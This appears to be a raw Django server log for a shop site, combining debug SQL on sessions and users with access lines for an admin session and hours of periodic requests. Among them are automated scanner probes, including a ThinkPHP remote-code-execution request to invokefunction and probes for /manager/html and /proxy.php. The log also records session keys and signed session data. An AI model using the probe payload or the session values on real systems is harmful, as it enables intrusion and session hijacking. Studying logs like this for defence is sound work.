args=(6,) DEBUG 2019-12-04 14:02:07,002 utils 9489 140436139382528 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-18T14:02:07.000814+00:00'::timestamptz WHERE "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 18, 14, 2, 7, 814, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') [04/Dec/2019 14:02:07] "GET /admin/ HTTP/1.0" 200 6019 [04/Dec/2019 14:02:07] "GET /static/admin/css/base.css HTTP/1.0" 304 0 [04/Dec/2019 14:02:07] "GET /static/admin/css/dashboard.css HTTP/1.0" 304 0 [04/Dec/2019 14:02:07] "GET /static/admin/css/responsive.css HTTP/1.0" 304 0 [04/Dec/2019 14:02:07] "GET /static/admin/css/fonts.css HTTP/1.0" 304 0 [04/Dec/2019 14:02:07] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 304 0 [04/Dec/2019 14:02:07] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 304 0 [04/Dec/2019 14:02:08] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 304 0 [04/Dec/2019 14:02:08] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 304 0 [04/Dec/2019 14:02:08] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 304 0 Not Found: /favicon.ico [04/Dec/2019 14:02:08] "GET /favicon.ico HTTP/1.0" 404 6411 DEBUG 2019-12-04 14:02:14,992 utils 9489 140436128892672 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-04T14:02:14.977447+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 4, 14, 2, 14, 977447, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-04 14:02:14,996 utils 9489 140436128892672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-04 14:02:15,010 utils 9489 140436128892672 (0.002) SELECT "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_content_type" WHERE ("django_content_type"."app_label" = 'shop' AND "django_content_type"."model" = 'category'); args=('shop', 'category') DEBUG 2019-12-04 14:02:15,100 utils 9489 140436128892672 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-18T14:02:15.096651+00:00'::timestamptz WHERE "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 18, 14, 2, 15, 96651, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') [04/Dec/2019 14:02:15] "GET /shop/category/add/ HTTP/1.0" 200 4645 DEBUG 2019-12-04 14:02:15,417 utils 9489 140436128892672 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-04T14:02:15.403788+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 4, 14, 2, 15, 403788, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-04 14:02:15,421 utils 9489 140436128892672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [04/Dec/2019 14:02:15] "GET /jsi18n/ HTTP/1.0" 200 3223 [04/Dec/2019 14:02:15] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 [04/Dec/2019 14:02:15] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 304 0 [04/Dec/2019 14:02:15] "GET /static/admin/js/jquery.init.js HTTP/1.0" 304 0 [04/Dec/2019 14:02:15] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 200 495 [04/Dec/2019 14:02:15] "GET /static/admin/js/change_form.js HTTP/1.0" 200 712 [04/Dec/2019 14:02:15] "GET /static/admin/js/core.js HTTP/1.0" 304 0 [04/Dec/2019 14:02:15] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 304 0 [04/Dec/2019 14:02:15] "GET /static/admin/css/widgets.css HTTP/1.0" 200 10340 [04/Dec/2019 14:02:15] "GET /static/admin/js/urlify.js HTTP/1.0" 304 0 [04/Dec/2019 14:02:15] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 304 0 [04/Dec/2019 14:02:15] "GET /static/admin/js/actions.js HTTP/1.0" 304 0 [04/Dec/2019 14:02:15] "GET /static/admin/js/prepopulate.js HTTP/1.0" 304 0 DEBUG 2019-12-04 14:02:20,597 utils 9489 140436153108224 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-04T14:02:20.584653+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 4, 14, 2, 20, 584653, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-04 14:02:20,600 utils 9489 140436153108224 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [04/Dec/2019 14:02:20] "GET /jsi18n/ HTTP/1.0" 200 3223 [04/Dec/2019 14:03:52] "GET / HTTP/1.0" 302 0 [04/Dec/2019 14:08:54] "GET / HTTP/1.0" 302 0 [04/Dec/2019 14:13:28] "GET / HTTP/1.0" 302 0 [04/Dec/2019 14:14:02] "GET / HTTP/1.0" 302 0 [04/Dec/2019 14:19:07] "GET / HTTP/1.0" 302 0 [04/Dec/2019 14:24:12] "GET / HTTP/1.0" 302 0 [04/Dec/2019 14:29:13] "GET / HTTP/1.0" 302 0 [04/Dec/2019 14:34:16] "GET / HTTP/1.0" 302 0 [04/Dec/2019 14:36:44] "GET / HTTP/1.0" 302 0 [04/Dec/2019 14:39:19] "GET / HTTP/1.0" 302 0 [04/Dec/2019 14:44:25] "GET / HTTP/1.0" 302 0 [04/Dec/2019 14:49:26] "GET / HTTP/1.0" 302 0 [04/Dec/2019 14:49:39] "GET / HTTP/1.0" 302 0 [04/Dec/2019 14:50:18] "GET / HTTP/1.0" 302 0 [04/Dec/2019 14:54:36] "GET / HTTP/1.0" 302 0 [04/Dec/2019 14:59:40] "GET / HTTP/1.0" 302 0 [04/Dec/2019 15:04:48] "GET / HTTP/1.0" 302 0 [04/Dec/2019 15:09:53] "GET / HTTP/1.0" 302 0 [04/Dec/2019 15:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [04/Dec/2019 15:14:57] "GET / HTTP/1.0" 302 0 [04/Dec/2019 15:19:58] "GET / HTTP/1.0" 302 0 [04/Dec/2019 15:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [04/Dec/2019 15:25:08] "GET / HTTP/1.0" 302 0 [04/Dec/2019 15:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [04/Dec/2019 15:30:14] "GET / HTTP/1.0" 302 0 [04/Dec/2019 15:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [04/Dec/2019 15:35:17] "GET / HTTP/1.0" 302 0 [04/Dec/2019 15:40:23] "GET / HTTP/1.0" 302 0 [04/Dec/2019 15:45:24] "GET / HTTP/1.0" 302 0 [04/Dec/2019 15:46:28] "GET / HTTP/1.0" 302 0 [04/Dec/2019 15:50:25] "GET / HTTP/1.0" 302 0 [04/Dec/2019 15:55:26] "GET / HTTP/1.0" 302 0 [04/Dec/2019 16:00:31] "GET / HTTP/1.0" 302 0 [04/Dec/2019 16:05:34] "GET / HTTP/1.0" 302 0 [04/Dec/2019 16:10:43] "GET / HTTP/1.0" 302 0 [04/Dec/2019 16:12:07] "OPTIONS / HTTP/1.0" 302 0 [04/Dec/2019 16:15:45] "GET / HTTP/1.0" 302 0 [04/Dec/2019 16:20:55] "GET / HTTP/1.0" 302 0 [04/Dec/2019 16:26:00] "GET / HTTP/1.0" 302 0 [04/Dec/2019 16:31:07] "GET / HTTP/1.0" 302 0 [04/Dec/2019 16:36:08] "GET / HTTP/1.0" 302 0 [04/Dec/2019 16:36:39] "GET / HTTP/1.0" 302 0 [04/Dec/2019 16:41:11] "GET / HTTP/1.0" 302 0 [04/Dec/2019 16:46:19] "GET / HTTP/1.0" 302 0 [04/Dec/2019 16:51:28] "GET / HTTP/1.0" 302 0 [04/Dec/2019 16:56:32] "GET / HTTP/1.0" 302 0 [04/Dec/2019 17:01:37] "GET / HTTP/1.0" 302 0 [04/Dec/2019 17:06:37] "GET / HTTP/1.0" 302 0 [04/Dec/2019 17:11:46] "GET / HTTP/1.0" 302 0 [04/Dec/2019 17:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [04/Dec/2019 17:16:49] "GET / HTTP/1.0" 302 0 [04/Dec/2019 17:21:55] "GET / HTTP/1.0" 302 0 [04/Dec/2019 17:26:59] "GET / HTTP/1.0" 302 0 [04/Dec/2019 17:32:04] "GET / HTTP/1.0" 302 0 [04/Dec/2019 17:37:07] "GET / HTTP/1.0" 302 0 [04/Dec/2019 17:42:11] "GET / HTTP/1.0" 302 0 [04/Dec/2019 17:47:17] "GET / HTTP/1.0" 302 0 [04/Dec/2019 17:52:22] "GET / HTTP/1.0" 302 0 [04/Dec/2019 17:57:24] "GET / HTTP/1.0" 302 0 [04/Dec/2019 18:02:26] "GET / HTTP/1.0" 302 0 [04/Dec/2019 18:07:27] "GET / HTTP/1.0" 302 0 [04/Dec/2019 18:12:28] "GET / HTTP/1.0" 302 0 [04/Dec/2019 18:17:41] "GET / HTTP/1.0" 302 0 [04/Dec/2019 18:22:48] "GET / HTTP/1.0" 302 0 [04/Dec/2019 18:27:49] "GET / HTTP/1.0" 302 0 [04/Dec/2019 18:32:56] "GET / HTTP/1.0" 302 0 [04/Dec/2019 18:38:01] "GET / HTTP/1.0" 302 0 [04/Dec/2019 18:43:05] "GET / HTTP/1.0" 302 0 [04/Dec/2019 18:48:10] "GET / HTTP/1.0" 302 0 [04/Dec/2019 18:53:11] "GET / HTTP/1.0" 302 0 [04/Dec/2019 18:58:13] "GET / HTTP/1.0" 302 0 [04/Dec/2019 19:03:14] "GET / HTTP/1.0" 302 0 [04/Dec/2019 19:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [04/Dec/2019 19:08:16] "GET / HTTP/1.0" 302 0 [04/Dec/2019 19:12:50] "GET / HTTP/1.0" 302 0 [04/Dec/2019 19:13:18] "GET / HTTP/1.0" 302 0 [04/Dec/2019 19:18:25] "GET / HTTP/1.0" 302 0 [04/Dec/2019 19:23:30] "GET / HTTP/1.0" 302 0 [04/Dec/2019 19:28:32] "GET / HTTP/1.0" 302 0 [04/Dec/2019 19:33:11] "GET / HTTP/1.0" 302 0 Not Found: /manager/html [04/Dec/2019 19:33:34] "GET /manager/html HTTP/1.0" 404 6411 [04/Dec/2019 19:33:41] "GET / HTTP/1.0" 302 0 [04/Dec/2019 19:38:45] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [04/Dec/2019 19:41:18] "GET /proxy.php HTTP/1.0" 404 6409 [04/Dec/2019 19:43:51] "GET / HTTP/1.0" 302 0 [04/Dec/2019 19:49:05] "GET / HTTP/1.0" 302 0 [04/Dec/2019 19:55:02] "GET /whm-server-status HTTP/1.0" 301 0 [04/Dec/2019 19:57:39] "GET / HTTP/1.0" 302 0 [04/Dec/2019 20:05:03] "GET / HTTP/1.0" 302 0 [04/Dec/2019 20:10:05] "GET / HTTP/1.0" 302 0 [04/Dec/2019 20:15:02] "GET /whm-server-status HTTP/1.0" 301 0 [04/Dec/2019 20:15:08] "GET / HTTP/1.0" 302 0 [04/Dec/2019 20:20:11] "GET / HTTP/1.0" 302 0 [04/Dec/2019 20:25:14] "GET / HTTP/1.0" 302 0 [04/Dec/2019 20:32:36] "GET / HTTP/1.0" 302 0 [04/Dec/2019 20:37:39] "GET / HTTP/1.0" 302 0 [04/Dec/2019 20:42:42] "GET / HTTP/1.0" 302 0 [04/Dec/2019 20:47:44] "GET / HTTP/1.0" 302 0 [04/Dec/2019 20:52:49] "GET / HTTP/1.0" 302 0 [04/Dec/2019 20:57:52] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [04/Dec/2019 21:05:12] "GET /TP/public/index.php HTTP/1.0" 404 6432 Not Found: /TP/index.php [04/Dec/2019 21:05:12] "GET /TP/index.php HTTP/1.0" 404 6411 Not Found: /thinkphp/html/public/index.php [04/Dec/2019 21:05:13] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6465 Not Found: /html/public/index.php [04/Dec/2019 21:05:13] "GET /html/public/index.php HTTP/1.0" 404 6438 Not Found: /public/index.php [04/Dec/2019 21:05:14] "GET /public/index.php HTTP/1.0" 404 6423 Not Found: /TP/html/public/index.php [04/Dec/2019 21:05:14] "GET /TP/html/public/index.php HTTP/1.0" 404 6447 Not Found: /elrekt.php [04/Dec/2019 21:05:15] "GET /elrekt.php HTTP/1.0" 404 6405 Not Found: /index.php [04/Dec/2019 21:05:15] "GET /index.php HTTP/1.0" 404 6402 [04/Dec/2019 21:05:16] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-04 21:05:16,570 utils 9489 140436153108224 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'enlbjz1vdc6rg1axkp3excd4qpxrqfp0' LIMIT 1; args=('enlbjz1vdc6rg1axkp3excd4qpxrqfp0',) DEBUG 2019-12-04 21:05:16,573 utils 9489 140436153108224 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('enlbjz1vdc6rg1axkp3excd4qpxrqfp0', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-18T21:05:16.571562+00:00'::timestamptz); args=('enlbjz1vdc6rg1axkp3excd4qpxrqfp0', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 18, 21, 5, 16, 571562, tzinfo=)) [04/Dec/2019 21:05:16] "GET /login/?next=/ HTTP/1.0" 200 1786 [04/Dec/2019 21:07:06] "GET / HTTP/1.0" 302 0 [04/Dec/2019 21:09:50] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-04 21:09:50,662 utils 9489 140436153108224 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 's9tp0dh0czzfkxh4ilhbowqalwp3jxdi' LIMIT 1; args=('s9tp0dh0czzfkxh4ilhbowqalwp3jxdi',) DEBUG 2019-12-04 21:09:50,666 utils 9489 140436153108224 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('s9tp0dh0czzfkxh4ilhbowqalwp3jxdi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-18T21:09:50.663614+00:00'::timestamptz); args=('s9tp0dh0czzfkxh4ilhbowqalwp3jxdi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 18, 21, 9, 50, 663614, tzinfo=)) [04/Dec/2019 21:09:50] "GET /login/?next=/ HTTP/1.0" 200 1786 [04/Dec/2019 21:12:09] "GET / HTTP/1.0" 302 0 [04/Dec/2019 21:21:09] "GET / HTTP/1.0" 302 0 [04/Dec/2019 21:26:12] "GET / HTTP/1.0" 302 0 [04/Dec/2019 21:31:15] "GET / HTTP/1.0" 302 0 [04/Dec/2019 21:36:07] "GET / HTTP/1.0" 302 0 [04/Dec/2019 21:37:37] "GET / HTTP/1.0" 302 0 [04/Dec/2019 21:43:13] "GET / HTTP/1.0" 302 0 [04/Dec/2019 21:48:16] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [04/Dec/2019 21:49:45] "GET /proxy.php HTTP/1.0" 404 6411 [04/Dec/2019 21:53:19] "GET / HTTP/1.0" 302 0 [04/Dec/2019 21:58:21] "GET / HTTP/1.0" 302 0 Not Found: /index.php [04/Dec/2019 22:00:43] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.0" 404 6519 [04/Dec/2019 22:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [04/Dec/2019 22:05:03] "GET / HTTP/1.0" 302 0 [04/Dec/2019 22:10:06] "GET / HTTP/1.0" 302 0 [04/Dec/2019 22:15:09] "GET / HTTP/1.0" 302 0 [04/Dec/2019 22:22:00] "GET / HTTP/1.0" 302 0 [04/Dec/2019 22:27:14] "GET / HTTP/1.0" 302 0 [04/Dec/2019 22:32:17] "GET / HTTP/1.0" 302 0 [04/Dec/2019 22:37:37] "GET / HTTP/1.0" 302 0 [04/Dec/2019 22:42:40] "GET / HTTP/1.0" 302 0 [04/Dec/2019 22:47:43] "GET / HTTP/1.0" 302 0 [04/Dec/2019 22:52:46] "GET / HTTP/1.0" 302 0 [04/Dec/2019 22:57:48] "GET / HTTP/1.0" 302 0 [04/Dec/2019 23:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [04/Dec/2019 23:05:03] "GET / HTTP/1.0" 302 0 [04/Dec/2019 23:09:27] "GET / HTTP/1.0" 302 0 [04/Dec/2019 23:10:06] "GET / HTTP/1.0" 302 0 [04/Dec/2019 23:15:08] "GET / HTTP/1.0" 302 0 [04/Dec/2019 23:20:11] "GET / HTTP/1.0" 302 0 [04/Dec/2019 23:21:28] "GET / HTTP/1.0" 302 0 [04/Dec/2019 23:25:13] "GET / HTTP/1.0" 302 0 [04/Dec/2019 23:31:56] "GET / HTTP/1.0" 302 0 Not Found: /license.php [04/Dec/2019 23:34:25] "GET /license.php HTTP/1.0" 404 6409 [04/Dec/2019 23:37:37] "GET / HTTP/1.0" 302 0 [04/Dec/2019 23:42:39] "GET / HTTP/1.0" 302 0 [04/Dec/2019 23:47:42] "GET / HTTP/1.0" 302 0 [04/Dec/2019 23:52:44] "GET / HTTP/1.0" 302 0 [04/Dec/2019 23:57:47] "GET / HTTP/1.0" 302 0 [05/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [05/Dec/2019 00:10:05] "GET / HTTP/1.0" 302 0 [05/Dec/2019 00:11:59] "GET / HTTP/1.0" 302 0 [05/Dec/2019 00:15:08] "GET / HTTP/1.0" 302 0 [05/Dec/2019 00:20:10] "GET / HTTP/1.0" 302 0 [05/Dec/2019 00:25:13] "GET / HTTP/1.0" 302 0 [05/Dec/2019 00:30:16] "GET / HTTP/1.0" 302 0 [05/Dec/2019 00:37:37] "GET / HTTP/1.0" 302 0 [05/Dec/2019 00:46:54] "GET / HTTP/1.0" 302 0 [05/Dec/2019 00:51:57] "GET / HTTP/1.0" 302 0 [05/Dec/2019 00:56:59] "GET / HTTP/1.0" 302 0 [05/Dec/2019 01:05:02] "GET / HTTP/1.0" 302 0 [05/Dec/2019 01:11:19] "GET / HTTP/1.0" 302 0 [05/Dec/2019 01:11:23] "GET / HTTP/1.0" 302 0 [05/Dec/2019 01:16:25] "GET / HTTP/1.0" 302 0 [05/Dec/2019 01:19:37] "GET / HTTP/1.0" 302 0 [05/Dec/2019 01:21:28] "GET / HTTP/1.0" 302 0 [05/Dec/2019 01:26:31] "GET / HTTP/1.0" 302 0 [05/Dec/2019 01:31:33] "GET / HTTP/1.0" 302 0 [05/Dec/2019 01:37:37] "GET / HTTP/1.0" 302 0 [05/Dec/2019 01:42:39] "GET / HTTP/1.0" 302 0 [05/Dec/2019 01:52:19] "GET / HTTP/1.0" 302 0 [05/Dec/2019 01:55:02] "GET / HTTP/1.0" 302 0 [05/Dec/2019 01:57:22] "GET / HTTP/1.0" 302 0 [05/Dec/2019 02:04:05] "GET / HTTP/1.0" 302 0 [05/Dec/2019 02:09:56] "GET / HTTP/1.0" 302 0 [05/Dec/2019 02:12:44] "GET / HTTP/1.0" 302 0 [05/Dec/2019 02:14:58] "GET / HTTP/1.0" 302 0 [05/Dec/2019 02:20:00] "GET / HTTP/1.0" 302 0 [05/Dec/2019 02:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [05/Dec/2019 02:28:16] "GET / HTTP/1.0" 302 0 [05/Dec/2019 02:28:43] "GET / HTTP/1.0" 302 0 [05/Dec/2019 02:37:37] "GET / HTTP/1.0" 302 0 [05/Dec/2019 02:43:58] "GET / HTTP/1.0" 302 0 [05/Dec/2019 02:45:01] "GET /whm-server-status HTTP/1.0" 301 0 [05/Dec/2019 02:49:43] "GET / HTTP/1.0" 302 0 [05/Dec/2019 02:54:46] "GET / HTTP/1.0" 302 0 [05/Dec/2019 02:54:53] "GET / HTTP/1.0" 302 0 [05/Dec/2019 02:54:54] "GET / HTTP/1.0" 302 0 [05/Dec/2019 02:58:38] "GET / HTTP/1.0" 302 0 [05/Dec/2019 02:59:48] "GET / HTTP/1.0" 302 0 [05/Dec/2019 03:05:03] "GET / HTTP/1.0" 302 0 Not Found: /clientaccesspolicy.xml [05/Dec/2019 03:09:12] "GET /clientaccesspolicy.xml HTTP/1.0" 404 6441 [05/Dec/2019 03:10:06] "GET / HTTP/1.0" 302 0 [05/Dec/2019 03:15:09] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [05/Dec/2019 03:19:41] "GET /proxy.php HTTP/1.0" 404 6407 [05/Dec/2019 03:20:11] "GET / HTTP/1.0" 302 0 [05/Dec/2019 03:25:14] "GET / HTTP/1.0" 302 0 [05/Dec/2019 03:30:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 03:30:09,830 utils 9489 140436153108224 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'o71cnrqnsdj9lbdroqto0z5b1lfplpov' LIMIT 1; args=('o71cnrqnsdj9lbdroqto0z5b1lfplpov',) DEBUG 2019-12-05 03:30:09,832 utils 9489 140436153108224 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('o71cnrqnsdj9lbdroqto0z5b1lfplpov', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-19T03:30:09.830893+00:00'::timestamptz); args=('o71cnrqnsdj9lbdroqto0z5b1lfplpov', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 19, 3, 30, 9, 830893, tzinfo=)) [05/Dec/2019 03:30:09] "GET /login/?next=/ HTTP/1.0" 200 1786 [05/Dec/2019 03:30:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 03:30:10,249 utils 9489 140436153108224 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '8pwe7g64skaz6ykj2imgbgj77wfteyl6' LIMIT 1; args=('8pwe7g64skaz6ykj2imgbgj77wfteyl6',) DEBUG 2019-12-05 03:30:10,251 utils 9489 140436153108224 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('8pwe7g64skaz6ykj2imgbgj77wfteyl6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-19T03:30:10.250302+00:00'::timestamptz); args=('8pwe7g64skaz6ykj2imgbgj77wfteyl6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 19, 3, 30, 10, 250302, tzinfo=)) [05/Dec/2019 03:30:10] "GET /login/?next=/ HTTP/1.0" 200 1786 [05/Dec/2019 03:30:17] "GET / HTTP/1.0" 302 0 [05/Dec/2019 03:37:37] "GET / HTTP/1.0" 302 0 [05/Dec/2019 03:43:16] "GET / HTTP/1.0" 302 0 [05/Dec/2019 03:46:05] "GET / HTTP/1.0" 302 0 [05/Dec/2019 03:51:08] "GET / HTTP/1.0" 302 0 [05/Dec/2019 04:00:01] "GET / HTTP/1.0" 302 0 [05/Dec/2019 04:05:04] "GET / HTTP/1.0" 302 0 [05/Dec/2019 04:10:07] "GET / HTTP/1.0" 302 0 [05/Dec/2019 04:17:24] "GET / HTTP/1.0" 302 0 [05/Dec/2019 04:22:26] "GET / HTTP/1.0" 302 0 [05/Dec/2019 04:27:29] "GET / HTTP/1.0" 302 0 [05/Dec/2019 04:32:31] "GET / HTTP/1.0" 302 0 [05/Dec/2019 04:37:37] "GET / HTTP/1.0" 302 0 [05/Dec/2019 04:42:39] "GET / HTTP/1.0" 302 0 [05/Dec/2019 04:50:43] "GET / HTTP/1.0" 302 0 [05/Dec/2019 04:55:46] "GET / HTTP/1.0" 302 0 [05/Dec/2019 05:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [05/Dec/2019 05:05:03] "GET / HTTP/1.0" 302 0 [05/Dec/2019 05:10:05] "GET / HTTP/1.0" 302 0 [05/Dec/2019 05:15:08] "GET / HTTP/1.0" 302 0 [05/Dec/2019 05:20:10] "GET / HTTP/1.0" 302 0 [05/Dec/2019 05:22:21] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 05:22:21,525 utils 9489 140436153108224 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'pdzl5dn42tkb1s8bpzbn88pvpll9mef5' LIMIT 1; args=('pdzl5dn42tkb1s8bpzbn88pvpll9mef5',) DEBUG 2019-12-05 05:22:21,527 utils 9489 140436153108224 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('pdzl5dn42tkb1s8bpzbn88pvpll9mef5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-19T05:22:21.526063+00:00'::timestamptz); args=('pdzl5dn42tkb1s8bpzbn88pvpll9mef5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 19, 5, 22, 21, 526063, tzinfo=)) [05/Dec/2019 05:22:21] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-12-05 05:22:21,662 utils 9489 140436153108224 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '36knw7s76yvnckkjz2p62a9dju8w7tsl' LIMIT 1; args=('36knw7s76yvnckkjz2p62a9dju8w7tsl',) DEBUG 2019-12-05 05:22:21,664 utils 9489 140436153108224 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES 